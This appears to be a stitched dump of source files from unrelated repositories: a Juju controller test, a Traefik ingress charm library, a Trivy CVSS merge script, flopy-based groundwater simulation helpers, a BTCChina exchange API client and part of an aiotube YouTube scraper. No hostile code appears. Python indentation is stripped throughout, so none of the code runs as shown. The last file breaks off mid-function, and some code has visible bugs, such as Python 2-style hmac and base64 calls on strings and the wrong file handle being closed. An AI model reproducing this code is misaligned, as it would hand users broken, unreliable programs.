from juju.controller import Controller
from juju.juju import Juju
from .. import base
@base.bootstrapped
@pytest.mark.asyncio
async def test_get_controllers(event_loop):
async with base.CleanController() as controller:
j = Juju()
controllers = j.get_controllers()
assert isinstance(controllers, dict)
assert len(controllers) >= 1
assert controller.controller_name in controllers
cc = await j.get_controller(controller.controller_name)
assert isinstance(cc, Controller)
assert controller.connection().endpoint == cc.connection().endpoint
``` |
{
"source": "jnsgruk/traefik-k8s-operator",
"score": 2
} |
#### File: v0/ingress_per_unit/__init__.py
```python
LIBID = "" # can't register a library until the charm is in the store 9_9
# Increment this major API version when introducing breaking changes
LIBAPI = 0
# Increment this PATCH version before using `charmcraft publish-lib` or reset
# to 0 if you are raising the major API version
LIBPATCH = 1
from . import testing
# flake8: noqa: E401,E402
from .ingress_per_unit import IngressPerUnitProvider, IngressPerUnitRequirer
```
#### File: v0/ingress_per_unit/testing.py
```python
from ops.model import Relation
from sborl.testing import MockRemoteRelationMixin
from .ingress_per_unit import (
IngressPerUnitProvider,
IngressPerUnitRequirer,
IngressRequest,
)
class MockIPUProvider(MockRemoteRelationMixin, IngressPerUnitProvider):
"""Class to help with unit testing ingress requirer charms.
Exactly the same as the normal IngressPerUnitProvider but, acts as if it's on
the remote side of any relation, and it automatically triggers events when
responses are sent.
"""
def get_request(self, relation: Relation):
"""Get the IngressRequest for the given Relation."""
# reflect the relation for the request so that it appears remote
return MockIngressRequest(self, relation)
class MockIngressRequest(IngressRequest):
"""Testing wrapper for an IngressRequest.
Exactly the same as the normal IngressRequest but acts as if it's on the
remote side of any relation, and it automatically triggers events when
responses are sent.
"""
@property
def app(self):
"""The remote application."""
return self._provider.harness.charm.app
@property
def units(self):
"""The remote units."""
return [self._provider.harness.charm.unit]
class MockIPURequirer(MockRemoteRelationMixin, IngressPerUnitRequirer):
"""Class to help with unit testing ingress provider charms.
Exactly the same as the normal IngressPerUnitRequirer, but acts as if it's on
the remote side of any relation, and it automatically triggers events when
requests are sent.
"""
@property
def urls(self):
"""The full ingress URLs to reach every unit.
May return an empty dict if the URLs aren't available yet.
"""
with self.remote_context(self.relation):
return super().urls
``` |
{
"source": "jnsgruk/trivy-cvss-tools",
"score": 3
} |
#### File: jnsgruk/trivy-cvss-tools/add-cvss.py
```python
import gzip
import json
import logging
import sys
from json.decoder import JSONDecodeError
# Get the filename of the CVSS JSON
cvss_filename = sys.argv[1]
# Get the filename of the trivy report from the first argument
report_filename = sys.argv[2]
def parse_file_or_quit(filename, gzipped=False):
try:
file = gzip.open(filename, "rb") if gzipped else open(filename, "r")
parsed = json.load(file)
file.close()
return parsed
except JSONDecodeError:
print(f"File: {filename} is not valid JSON! Exiting...",
file=sys.stderr)
sys.exit(1)
except FileNotFoundError:
# If file not found, bail out!
print(f"File: {filename} not found. Exiting...", file=sys.stderr)
sys.exit(1)
except:
# If file not found, bail out!
print(
f"Error opening file: {filename}, is it the right format? Exiting...", file=sys.stderr)
sys.exit(1)
# Open and parse the files
report_json = parse_file_or_quit(report_filename)
cvss_json = parse_file_or_quit(cvss_filename, gzipped=True)
# Iterate over items in the trivy report
if report_json[0]["Vulnerabilities"] != None:
for item in report_json[0]["Vulnerabilities"]:
try:
# Get the CVE name to index the CVSS file
cve_name = item['VulnerabilityID']
# Add the CVSS info if available
item["CVSS"] = cvss_json[cve_name]
except KeyError:
# If not available set blank and move on
item["CVSS"] = {}
continue
# Dump the JSON to stdout
print(json.dumps(report_json, indent=2, ensure_ascii=False))
``` |
{
"source": "Jnsll/Scripts4WaterFlowExp",
"score": 3
} |
#### File: Scripts4WaterFlowExp/src/helpers.py
```python
import flopy
import os
def importDataFromModel(modelname, dataToLoad):
"""
param dataToLoad : a list with the type of data to load from the model
example : ['upw', 'dis']
"""
mf1 = flopy.modflow.Modflow.load(modelname + '.nam', verbose=False,check=False, load_only=dataToLoad)
return mf1
def writeExecutionTimeInLogfile(path, modelname, duration):
with open(path + '/' + modelname + '_log.txt', 'w') as f:
f.write('Execution time (s) of ' + modelname +'\n')
f.write(str(duration))
def getPathToSimulationDirectoryFromModelname(modelname):
repo = "data"
return os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-2]), repo, modelname)
def getFloodDurationVTUFileNameFromModelnameAndLimitValueForFloodZone(modelname, upperLimitForFloodZone):
return "VTU_WaterTable_" + modelname + "_FloodDuration_" + str(upperLimitForFloodZone) + ".vtu"
def generate_model_name(chronicle, approx, rate, ref, site=None, time_param=0, geology_param=0, thickness_param=1, permeability_param=86.4, theta_param=0.1, step=None):
model_name = r'model_' + 'time_' + str(time_param) + '_geo_' + str(geology_param) + '_thick_' + str(thickness_param)
if geology_param == 0:
model_name = model_name + '_K_' + str(permeability_param) + '_Sy_' + str(theta_param)
if step is None:
model_name += "_Step" + str(1)
else:
model_name += "_Step" + str(step)
if site is not None:
model_name += "_site" + str(site)
if chronicle is not None:
model_name += "_Chronicle" + str(chronicle)
else:
model_name += "_Chronicle" + str(chronicle)
if (not ref):
model_name += "_Approx" + str(approx)
if approx==0:
model_name += "_Period" + str(rate)
elif approx==1:
model_name += "_RechThreshold" + str(rate)
return model_name
```
#### File: src/old/Indicator_variantes.py
```python
def computeFloodsAndHErrorFromModelnamesByInterpolationWithoutSeaLvl(ref, modelname, site_number,timestep=1):
site_name = getSiteNameFromSiteNumber(site_number)
repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
# Get values for topo
topoRef = getSoilSurfaceValuesForASimulation(repoRef, ref)
topoSimu = getSoilSurfaceValuesForASimulation(repoSimu, modelname)
# Get heads values for simulation
simuHds = fpu.HeadFile(repoSimu + '/' + modelname + '.hds')
simuTimes = simuHds.get_times()
#simuKstpkper = simuHds.get_kstpkper()
refHds = fpu.HeadFile(repoRef + '/' + ref + '.hds')
# Comput parameters
startTime = 0
endTime = 15340
dc = 0.3
alpha = float(1/3)
#endTime+1 - startTime
floods = {}
# hErrorGlobal = 0
smWs = 0
sherrorsup = 0
sea_lvl = getSeaLvl()
#Pour chaque jour
for day in range(startTime, endTime+1):
print(day)
# On récupère la matrice de simulation ref
refHead = refHds.get_data(kstpkper=(0, day))
nbPeriod = 0
while (simuTimes[nbPeriod] < day+1) and (nbPeriod < len(simuTimes)):
nbPeriod+=1
print("nbPeriod : " + str(nbPeriod))
#On récupère la matrice de simulation alt supérieure
print(simuTimes[nbPeriod], day+1)
if math.isclose(simuTimes[nbPeriod], day+1, rel_tol=1e-3): #simuTimes[nbPeriod] == day+1
print("condition ==")
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = altHeadSup
duree = int(simuTimes[nbPeriod])
pas = 0
else :
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = simuHds.get_data(kstpkper=(timestep-1, nbPeriod-1))
duree = int(simuTimes[nbPeriod] - simuTimes[nbPeriod-1])
pas = day - simuTimes[nbPeriod-1]
nbrowtot = altHeadInf.shape[1]
nbcoltot = altHeadInf.shape[2]
# onecol = [0]*nbcoltot
# flood = [onecol]
# for i in range(1, nbrowtot):
# flood.append(onecol)
flood = {}
for nrow in range(nbrowtot):
flood[nrow] = {}
for ncol in range(nbcoltot):
ss = getNonDryCellHdsValue(altHeadInf, nrow, ncol, altHeadInf.shape[0]) # Valeur de head
se = getNonDryCellHdsValue(altHeadSup, nrow, ncol, altHeadInf.shape[0])
ajoutSimu = (se - ss) / duree
#print("ss:", ss)
s = ss + (ajoutSimu * pas) # valeur head pour le jour considere
if math.isclose(s, sea_lvl, rel_tol=1e-3):
print("Sea zone with watertable level : ", s, "sea_lvl :", sea_lvl)
continue
d = topoSimu[nrow][ncol] - s # profondeur : altitude topo - altitude toit de la nappe
if d <= dc:
flood[nrow][ncol] = 1
#print("Cas flood = 1", day)
print("row : ", nrow, "col: ", ncol)
print("topo: ", topoSimu[nrow][ncol], "s: ", s)
r= getNonDryCellHdsValue(refHead, nrow, ncol,refHead.shape[0]) # valeur de head pour reference
WsRef = getWeightToSurface(topoRef[nrow][ncol], r, dc, alpha)
WsSimu = getWeightToSurface(topoSimu[nrow][ncol], s, dc, alpha)
mWs = max(WsRef, WsSimu)
sherrorsup += (mWs * (r-s)**2)
smWs += mWs
floods[day] = flood
f = open(repoSimu + "/" + modelname + '_floods_pickle_dict_nosea.txt','wb')
pickle.dump(floods, f)
hErrorGlobal = math.sqrt(sherrorsup / smWs)
with open(repoSimu + "/" + modelname + '_Ref_' + ref + '_errorsresult_H_nosea.csv', 'w') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow(['H Error'])
writer.writerow([hErrorGlobal])
print("h error : " + str(hErrorGlobal))
return nbrowtot, nbcoltot
def computeOnlyFloodsFromModelnamesByInterpolation(ref, modelname, site_number,timestep=1):
site_name = getSiteNameFromSiteNumber(site_number)
#repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
# Get values for topo
#topoRef = getSoilSurfaceValuesForASimulation(repoRef, ref)
topoSimu = getSoilSurfaceValuesForASimulation(repoSimu, modelname)
# Get heads values for simulation
simuHds = fpu.HeadFile(repoSimu + '/' + modelname + '.hds')
simuTimes = simuHds.get_times()
#simuKstpkper = simuHds.get_kstpkper()
#refHds = fpu.HeadFile(repoRef + '/' + ref + '.hds')
# Comput parameters
startTime = 0
endTime = 15340
dc = 0.3
#endTime+1 - startTime
floods = {}
# hErrorGlobal = 0
#sea_lvl = getSeaLvl()
#Pour chaque jour
for day in range(startTime, endTime+1):
print(day)
# On récupère la matrice de simulation ref
#refHead = refHds.get_data(kstpkper=(0, day))
nbPeriod = 0
while (simuTimes[nbPeriod] < day+1) and (nbPeriod < len(simuTimes)):
nbPeriod+=1
print("nbPeriod : " + str(nbPeriod))
#On récupère la matrice de simulation alt supérieure
if math.isclose(simuTimes[nbPeriod], day+1, rel_tol=1e-3): #simuTimes[nbPeriod] == day+1
print("condition ==")
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = altHeadSup
duree = int(simuTimes[nbPeriod])
pas = 0
else :
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = simuHds.get_data(kstpkper=(timestep-1, nbPeriod-1))
duree = int(simuTimes[nbPeriod] - simuTimes[nbPeriod-1])
pas = day - simuTimes[nbPeriod-1]
nbrowtot = altHeadInf.shape[1]
nbcoltot = altHeadInf.shape[2]
flood = {}
for nrow in range(nbrowtot):
flood[nrow] = {}
for ncol in range(nbcoltot):
ss = getNonDryCellHdsValue(altHeadInf, nrow, ncol, altHeadInf.shape[0]) # Valeur de head
se = getNonDryCellHdsValue(altHeadSup, nrow, ncol, altHeadInf.shape[0])
ajoutSimu = (se - ss) / duree
s = ss + (ajoutSimu * pas) # valeur head pour le jour considere
# if math.isclose(s, sea_lvl, rel_tol=1e-3):
# print("Sea zone with watertable level : ", s, "sea_lvl :", sea_lvl)
# continue
d = topoSimu[nrow][ncol] - s # profondeur : altitude topo - altitude toit de la nappe
if d <= dc:
flood[nrow][ncol] = 1
print("row : ", nrow, "col: ", ncol)
print("topo: ", topoSimu[nrow][ncol], "s: ", s)
floods[day] = flood
f = open(repoSimu + "/" + modelname + '_floods_pickle_dict_nosea.txt','wb')
pickle.dump(floods, f)
return nbrowtot, nbcoltot
def getWtAndTsAndTrForASimulationWithoutSeaLvl(modelname, site_number, tsmax, nbrow, nbcol):
site_name = getSiteNameFromSiteNumber(int(site_number))
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
file = open(repoSimu + '/' + modelname + "_floods_pickle_dict_nosea.txt", 'rb')
floods = pickle.load(file)
file.close()
weights = {}
ts = {}
tr = {}
for nrow in range(nbrow):
weights[nrow] = {}
ts[nrow] = {}
tr[nrow] = {}
for ncol in range(nbcol):
fSimu = False
sflood = []
eflood = []
fduration = 0
ssaturation = []
esaturation = []
sduration = 0
for day in sorted(floods): # Start at 1 because we did not take the init period into account
#print(day)
if (nrow in floods[day]) and (ncol in floods[day][nrow]) and (fSimu is False):
# Si on entre dans une periode de saturation
fSimu = True
sflood.append(day) # On stocke le jour de debut de la periode de saturation
if (len(sflood) != 1):
esaturation.append(day)
elif (nrow not in floods[day] or ncol not in floods[day][nrow]) and (fSimu):
# Si on sort de la periode de saturation
fSimu = False
eflood.append(day) # On stocke le jour de fin de la periode de saturation
ssaturation.append(day)
#elif (floods[day][nrow][ncol]==1) and (fSimu is False):
elif (day == len(floods)-1) and (fSimu):
eflood.append(day)
# print("day : ",day,"\n")
# print("value of floods : ",floods[day][nrow][ncol])
# print("date start flood", len(sflood))
# print(sflood[-1])
print("nb row : ",nrow, "nb col : ", ncol)
m = 0
while m < len(eflood):
# Pour toutes les periodes de saturation complete (il y a une date de fin)
# On ajoute la duree de la periode
fduration += (eflood[m]-sflood[m])
#print((eflood[m]-sflood[m]))
m+=1
# On fait la moyenne des durees
if len(eflood) == 0:
fduration = 0
else:
fduration = fduration / len(eflood)
n = 0
while n < len(esaturation):
sduration += (esaturation[n] - ssaturation[n])
n+=1
if len(esaturation) == 0:
sduration = 0
else:
sduration = sduration / len(esaturation)
# Storing the values for the weights and duration of saturation periods
wt = getWeightToSaturationDuration(tsmax, fduration)
weights[nrow][ncol] = wt
ts[nrow][ncol] = fduration
tr[nrow][ncol] = sduration
fweights = open(repoSimu + "/" + modelname + '_weights_pickle_nosea.txt','wb')
pickle.dump(weights, fweights)
fweights.close()
fts = open(repoSimu + "/" + modelname + '_ts_pickle_nosea.txt', 'wb')
pickle.dump(ts, fts)
fts.close()
ftr = open(repoSimu + "/" + modelname + '_tr_pickle_nosea.txt', 'wb')
pickle.dump(tr, ftr)
fts.close()
return weights, ts, tr
def computeTsAndTrErrorsForASimulationWithFilesByMedian(ref, modelname, site_number, nbrow, nbcol, tsmax):
site_name = getSiteNameFromSiteNumber(int(site_number))
repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
# get for reference
wRef = open(repoRef + '/' + ref + "_weights_pickle.txt", 'rb')
weightsRef = pickle.load(wRef)
wRef.close()
tRef = open(repoRef + '/' + ref + "_ts_pickle.txt", 'rb')
tsRef = pickle.load(tRef)
tRef.close()
ttRef = open(repoRef + '/' + ref + "_tr_pickle.txt", 'rb')
trRef = pickle.load(ttRef)
ttRef.close()
wSimu = open(repoSimu + '/' + modelname + "_weights_pickle.txt", 'rb')
weightsSimu = pickle.load(wSimu)
wSimu.close()
tSimu = open(repoSimu + '/' + modelname + "_ts_pickle.txt", 'rb')
tsSimu = pickle.load(tSimu)
tSimu.close()
ttSimu = open(repoSimu + '/' + modelname + "_tr_pickle.txt", 'rb')
trSimu = pickle.load(ttSimu)
ttSimu.close()
#weightsSimu, tsSimu, trSimu = getWtAndTsAndTrForASimulation(modelname, site_number, tsmax, nbrow, nbcol)
smWt = 0
tserrorsup = []
trerrorsup = []
for nrow in range(nbrow):
for ncol in range(nbcol):
print("nb row : ",nrow, "nb col : ", ncol)
mWt = max(weightsRef[nrow][ncol], weightsSimu[nrow][ncol])
print("max poids : ",mWt)
smWt += mWt
if mWt == 1 and (tsRef[nrow][ncol]- tsSimu[nrow][ncol] != 0):
tserrorsup.append(abs(tsRef[nrow][ncol]- tsSimu[nrow][ncol]))
print("tsRef : ", tsRef[nrow][ncol], "tsSimu : ", tsSimu[nrow][ncol], "tsdiff :", (tsRef[nrow][ncol]- tsSimu[nrow][ncol]))
#print("tserrorsup",tserrorsup)
trerrorsup.append(abs(trRef[nrow][ncol]- trSimu[nrow][ncol]))
if smWt == 0:
tsErrorGlobal = 0
tsErrorGlobal = 0
else:
print("tserrorsup", tserrorsup, "smWt", smWt)
tsErrorGlobal = statistics.median(tserrorsup)
trErrorGlobal = statistics.median(trerrorsup)
with open(repoSimu + "/" + modelname + '_Ref_' + ref + '_errorsresult_TSAndTR_median_abs.csv', 'w') as output:
writer = csv.writer(output, delimiter=';')
writer.writerow(['TS Error', 'TR Error'])
writer.writerow([tsErrorGlobal, trErrorGlobal])
print("Ts Error value : ", tsErrorGlobal)
print("Tr Error value : ", trErrorGlobal)
return tsErrorGlobal,trErrorGlobal
def storeErrorValuesIntoCSVFile(ref, modelname, site_name, periodNumber, simulatedDuration, mea, mre, rmse):
simuRepo = getPathToSimulationDirectoryFromModelname(modelname, site_name)
if (periodNumber == 0):
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult.csv', 'w') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow(['Period Number', 'Simulated Time', 'MAE', 'MRE', 'RMSE'])
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
else:
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult.csv', 'a') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("-------------------------")
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
def storeErrorValuesIntoCSVFileByInterpolation(ref, modelname, site_name, periodNumber, simulatedDuration, mea, mre, rmse, startTime, endTime):
simuRepo = getPathToSimulationDirectoryFromModelname(modelname, site_name)
nbPart = str(startTime) + "_" + str(endTime)
if (periodNumber == startTime):
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult_interpolation_' + str(nbPart) + '.csv', 'w') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow(['Period Number', 'Simulated Time', 'MAE', 'MRE', 'RMSE'])
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
else:
with open(simuRepo + "/" + modelname + '_Ref_' + ref + '_errorsresult_interpolation_' + str(nbPart) + '.csv', 'a') as f:
writer = csv.writer(f, delimiter=';')
writer.writerow([periodNumber, simulatedDuration, mea, mre, rmse])
print("-------------------------")
print("MEA value : ", mea)
print("MRE value : ", mre)
print("RMSE value : ", rmse)
def computeErrorRatesFromModelnamesByInterpoliationOptiParalFixedInit(ref, modelname, site_number, startTime, endTime, timestep):
site_name = getSiteNameFromSiteNumber(site_number)
repoRef = getPathToSimulationDirectoryFromModelname(ref, site_name)
print(repoRef)
repoSimu = getPathToSimulationDirectoryFromModelname(modelname, site_name)
refHds = fpu.HeadFile(repoRef + '/' + ref + '.hds')
refTimes = refHds.get_times()
refKstpkper = refHds.get_kstpkper()
simuHds = fpu.HeadFile(repoSimu + '/' + modelname + '.hds')
simuTimes = simuHds.get_times()
simuKstpkper = simuHds.get_kstpkper()
#Pour chaque jour
for day in range(startTime, endTime+1):
print(day)
# On récupère la matrice de simulation ref
refHead = refHds.get_data(kstpkper=(0, day))
nbPeriod = 0
while (simuTimes[nbPeriod] < day+1) and (nbPeriod < len(simuTimes)):
nbPeriod+=1
print("nbPeriod : " + str(nbPeriod))
#On récupère la matrice de simulation alt supérieure
print(simuTimes[nbPeriod], day+1)
if math.isclose(simuTimes[nbPeriod], day+1, rel_tol=1e-3): #simuTimes[nbPeriod] == day+1
print("condition ==")
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = altHeadSup
duree = int(simuTimes[nbPeriod])
pas = day
else :
altHeadSup = simuHds.get_data(kstpkper=(timestep-1, nbPeriod))
altHeadInf = simuHds.get_data(kstpkper=(timestep-1, nbPeriod-1))
duree = int(simuTimes[nbPeriod] - simuTimes[nbPeriod-1])
pas = day - simuTimes[nbPeriod-1]
mae = 0
mre = 0
rmse = 0
for nrow in range(refHead.shape[1]):
for ncol in range(refHead.shape[2]):
ss = getNonDryCellHdsValue(altHeadInf, nrow, ncol, refHead.shape[0])
se = getNonDryCellHdsValue(altHeadSup, nrow, ncol, refHead.shape[0])
ajoutSimu = (se - ss) / duree
r= getNonDryCellHdsValue(refHead, nrow, ncol,refHead.shape[0])
s = ss + (ajoutSimu * pas)
mae, mre, rmse = addValueToErrorIndicators(s, r, mae, mre, rmse)
sizeHeads = refHead.shape[1] * refHead.shape[2]
mae = mae / (sizeHeads)
rmse = math.sqrt(rmse / sizeHeads)
storeErrorValuesIntoCSVFileByInterpolation(ref, modelname, site_name, day, refTimes[day], mae, mre, rmse, startTime, endTime)
def addValueToErrorIndicators(s, r, mae, mre, rmse):
diff = (s - r)
mae += abs(diff)
mre += abs(diff / max(1, (s + r)/2))
rmse += diff**2
return mae, mre, rmse
# def getSeaLvl():
# sites = pd.read_csv(mainAppRepo + "data/study_sites.txt", sep='\s+', header=0, index_col=0)
# port = int(sites._get_values[site_number,5])
# ram = pd.read_table(mainAppRepo +"data/RAM.csv", delimiter=";", header=0)
# sea_level = ram.NM_IGN[port-1]
# return sea_level
if __name__ == '__main__':
computeErrorRatesFromModelnamesByInterpoliationOptiParalFixedInit(refname, modelname, site_number, startTime, endTime, timestep)
```
#### File: Scripts4WaterFlowExp/src/watertab.py
```python
import sys, os
import pandas as pd
import argparse
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'vtk_export_watertable'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'custom_utils'))
from custom_utils import helpers as utils
from vtk_export_watertable import vtk_export_watertable as vtk_watertable
def get_model_name(site_number, chronicle, approx, rate, ref):
model_name = "model_time_0_geo_0_thick_1_K_86.4_Sy_0.1_Step1_site" + str(site_number) + "_Chronicle" + str(chronicle)
if not ref:
model_name += "_Approx" + str(approx)
if approx == 0:
model_name += "_Period" + str(rate)
elif approx==1:
model_name += "_RechThreshold" + str(rate)
return model_name
def watertab(site, chronicle, approx, rate, ref, folder):
folder_path = os.path.dirname(os.path.abspath(__file__)) + '/'
sites = pd.read_table(folder_path + "data/study_sites.txt", sep=',', header=0, index_col=0)
model_name = get_model_name(site, chronicle, approx, rate, ref)
site_name = sites.index._data[site]
mainRepo = folder + '/' + site_name + '/' + model_name + '/'
coordinates = sites._get_values[site,1:5]
vtk_watertable(modelname=model_name, modelfolder=mainRepo, coord=coordinates)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-site", "--site", type=int, help= "2: Agon-Coutainville or 3:Saint-Germain-Sur-Ay", required=True)
parser.add_argument("-approx", "--approximation", type=int, required=True)
parser.add_argument("-chr", "--chronicle", type=int)
parser.add_argument("-rate", "--rate", type=float, required=False)
parser.add_argument("-f", "--folder", type=str, required=True)
parser.add_argument("-ref", "--ref", action='store_true')
args = parser.parse_args()
site = args.site
chronicle = args.chronicle
folder= args.folder
approx = args.approximation
chronicle = args.chronicle
rate = args.rate
ref = args.ref
watertab(site, chronicle, approx, rate, ref, folder)
``` |
{
"source": "jnslmk/CryptoBot",
"score": 3
} |
#### File: CryptoBot/app/btcchina.py
```python
import time
import re
import hmac
import hashlib
import base64
import http.client
import json
class BTCChina:
def __init__(self, access=None, secret=None):
self.access_key = access
self.secret_key = secret
self.conn = None
self._make_connection()
def _make_connection(self):
if self.conn:
self.conn.close()
self.conn = http.client.HTTPSConnection("api.btcchina.com")
def _get_tonce(self):
return int(time.time() * 1000000)
def _get_params_hash(self, pdict):
pstring = ""
# The order of params is critical for calculating a correct hash
fields = ['tonce', 'accesskey', 'requestmethod', 'id', 'method', 'params']
for f in fields:
if pdict[f]:
if f == 'params':
# Convert list to string, then strip brackets and spaces
# probably a cleaner way to do this
param_string = re.sub("[\[\] ]", "", str(pdict[f]))
param_string = re.sub("'", '', param_string)
param_string = re.sub("True", '1', param_string)
param_string = re.sub("False", '', param_string)
param_string = re.sub("None", '', param_string)
pstring += f + '=' + param_string + '&'
else:
pstring += f + '=' + str(pdict[f]) + '&'
else:
pstring += f + '=&'
pstring = pstring.strip('&')
# now with correctly ordered param string, calculate hash
phash = hmac.new(self.secret_key, pstring, hashlib.sha1).hexdigest()
return phash
def _private_request(self, post_data):
# fill in common post_data parameters
tonce = self._get_tonce()
post_data['tonce'] = tonce
post_data['accesskey'] = self.access_key
post_data['requestmethod'] = 'post'
# If ID is not passed as a key of post_data, just use tonce
if not 'id' in post_data:
post_data['id'] = tonce
pd_hash = self._get_params_hash(post_data)
# must use b64 encode
auth_string = 'Basic ' + base64.b64encode(self.access_key + ':' + pd_hash)
headers = {'Authorization': auth_string, 'Json-Rpc-Tonce': tonce}
# post_data dictionary passed as JSON
try:
self.conn.request("POST", '/api_trade_v1.php', json.dumps(post_data), headers)
response = self.conn.getresponse()
except Exception as e:
print("[btcchina.py] ***!!! Exception with httplib. Will reconnect.")
self._make_connection()
raise
else:
# check response code, ID, and existence of 'result' or 'error'
# before passing a dict of results
if response.status == 200:
# this might fail if non-json data is returned
resp_dict = json.loads(response.read())
# The id's may need to be used by the calling application,
# but for now, check and discard from the return dict
if str(resp_dict['id']) == str(post_data['id']):
if 'result' in resp_dict:
return resp_dict['result']
elif 'error' in resp_dict:
return resp_dict
else:
# not great error handling....
print("status:", response.status)
print("reason:", response.reason)
return None
def get_account_info(self, post_data={}):
post_data['method'] = 'getAccountInfo'
post_data['params'] = []
return self._private_request(post_data)
def get_market_depth2(self, limit=10, market="btccny", post_data={}):
post_data['method'] = 'getMarketDepth2'
post_data['params'] = [limit, market]
return self._private_request(post_data)
def buy(self, price, amount, market="btccny", post_data={}):
amountStr = "{0:.4f}".format(round(amount, 4))
post_data['method'] = 'buyOrder2'
if price == None:
priceStr = None
else:
priceStr = "{0:.4f}".format(round(price, 4))
post_data['params'] = [priceStr, amountStr, market]
return self._private_request(post_data)
def sell(self, price, amount, market="btccny", post_data={}):
amountStr = "{0:.4f}".format(round(amount, 4))
post_data['method'] = 'sellOrder2'
if price == None:
priceStr = None
else:
priceStr = "{0:.4f}".format(round(price, 4))
post_data['params'] = [priceStr, amountStr, market]
return self._private_request(post_data)
def cancel(self, order_id, market="btccny", post_data={}):
post_data['method'] = 'cancelOrder'
post_data['params'] = [order_id, market]
return self._private_request(post_data)
def request_withdrawal(self, currency, amount, post_data={}):
post_data['method'] = 'requestWithdrawal'
post_data['params'] = [currency, amount]
return self._private_request(post_data)
def get_deposits(self, currency='BTC', pending=True, post_data={}):
post_data['method'] = 'getDeposits'
post_data['params'] = [currency, pending]
return self._private_request(post_data)
def get_orders(self, id=None, open_only=True, market="btccny", details=True, post_data={}):
# this combines getOrder and getOrders
if id is None:
post_data['method'] = 'getOrders'
post_data['params'] = [open_only, market]
else:
post_data['method'] = 'getOrder'
post_data['params'] = [id, market, details]
return self._private_request(post_data)
def get_withdrawals(self, id='BTC', pending=True, post_data={}):
# this combines getWithdrawal and getWithdrawals
try:
id = int(id)
post_data['method'] = 'getWithdrawal'
post_data['params'] = [id]
except:
post_data['method'] = 'getWithdrawals'
post_data['params'] = [id, pending]
return self._private_request(post_data)
def get_transactions(self, trans_type='all', limit=10, post_data={}):
post_data['method'] = 'getTransactions'
post_data['params'] = [trans_type, limit]
return self._private_request(post_data)
def get_archived_order(self, id, market='btccny', withdetail=False, post_data={}):
post_data['method'] = 'getArchivedOrder'
post_data['params'] = [id, market, withdetail]
return self._private_request(post_data)
def get_archived_orders(self, market='btccny', limit=200, less_than_order_id=0, withdetail=False, post_data={}):
post_data['method'] = 'getArchivedOrders'
post_data['params'] = [market, limit, less_than_order_id, withdetail]
return self._private_request(post_data)
``` |
{
"source": "jnsougata/AioTube",
"score": 3
} |
#### File: src/aiotube/live.py
```python
from .video import Video
from ._threads import _Thread
from ._http import _get_video_data
from ._rgxs import _VideoPatterns as rgx
class Live(Video):
def __init__(self, video_id: str):
super().__init__(video_id)
@property
def duration(self) -> float:
return 0.0
@property
def streamed(self) -> bool:
return True
@property
def info(self) -> dict:
"""
:return: dict containing the whole info of the video
"""
raw = _get_video_data(self._id)
def _get_data(pattern):
data = pattern.findall(raw)
return data[0] if len(data) > 0 else None
patterns = [
rgx.title, rgx.views, rgx.likes, rgx.duration, rgx.author_id,
rgx.upload_date, rgx.thumbnail, rgx.tags, rgx.description
]
data = _Thread.run(_get_data, patterns)
return {
'title': data[0],
'id': self._id,
'views': data[1][:-6] if data[1] else None,
'likes': data[2],
'duration': self.duration,
'author': data[4],
'upload_date': data[5],
'url': self._url,
'thumbnail': data[6],
'tags': data[7].split(','),
'description': data[8].replace('\\n', '\n') if data[8] else None,
'streamed': self.streamed,
}
```
#### File: src/aiotube/playlist.py
```python
from ._threads import _Thread
from .utils import filter
from .videobulk import _VideoBulk
from ._http import _get_playlist_data
from ._rgxs import _PlaylistPatterns as rgx
from typing import List, Optional, Dict, Any
class Playlist:
__HEAD = 'https://www.youtube.com/playlist?list='
def __init__(self, playlist_id: str):
"""
:param str playlist_id: the _id of the playlist
"""
if 'youtube.com' in playlist_id:
self.id = playlist_id.split('list=')[-1]
else:
self.id = playlist_id
self.__playlist_data = _get_playlist_data(self.id)
def __repr__(self):
return f'<Playlist {self.url}>'
@property
def name(self) -> Optional[str]:
"""
:return: the name of the playlist
"""
names = rgx.name.findall(self.__playlist_data)
return names[0] if names else None
@property
def url(self) -> Optional[str]:
"""
:return: url of the playlist
"""
return f'https://www.youtube.com/playlist?list={self.id}'
@property
def video_count(self) -> Optional[str]:
"""
:return: total number of videos in that playlist
"""
video_count = rgx.video_count.findall(self.__playlist_data)
return video_count[0] if video_count else None
@property
def videos(self) -> _VideoBulk:
"""
:return: list of < video objects > for each video in the playlist (consider limit)
"""
videos = rgx.video_id.findall(self.__playlist_data)
return _VideoBulk(filter(iterable=videos))
@property
def thumbnail(self) -> Optional[str]:
"""
:return: url of the thumbnail of the playlist
"""
thumbnails = rgx.thumbnail.findall(self.__playlist_data)
return thumbnails[0] if thumbnails else None
@property
def info(self) -> Dict[str, Any]:
"""
:return: a dict containing playlist info
"""
def _get_data(pattern):
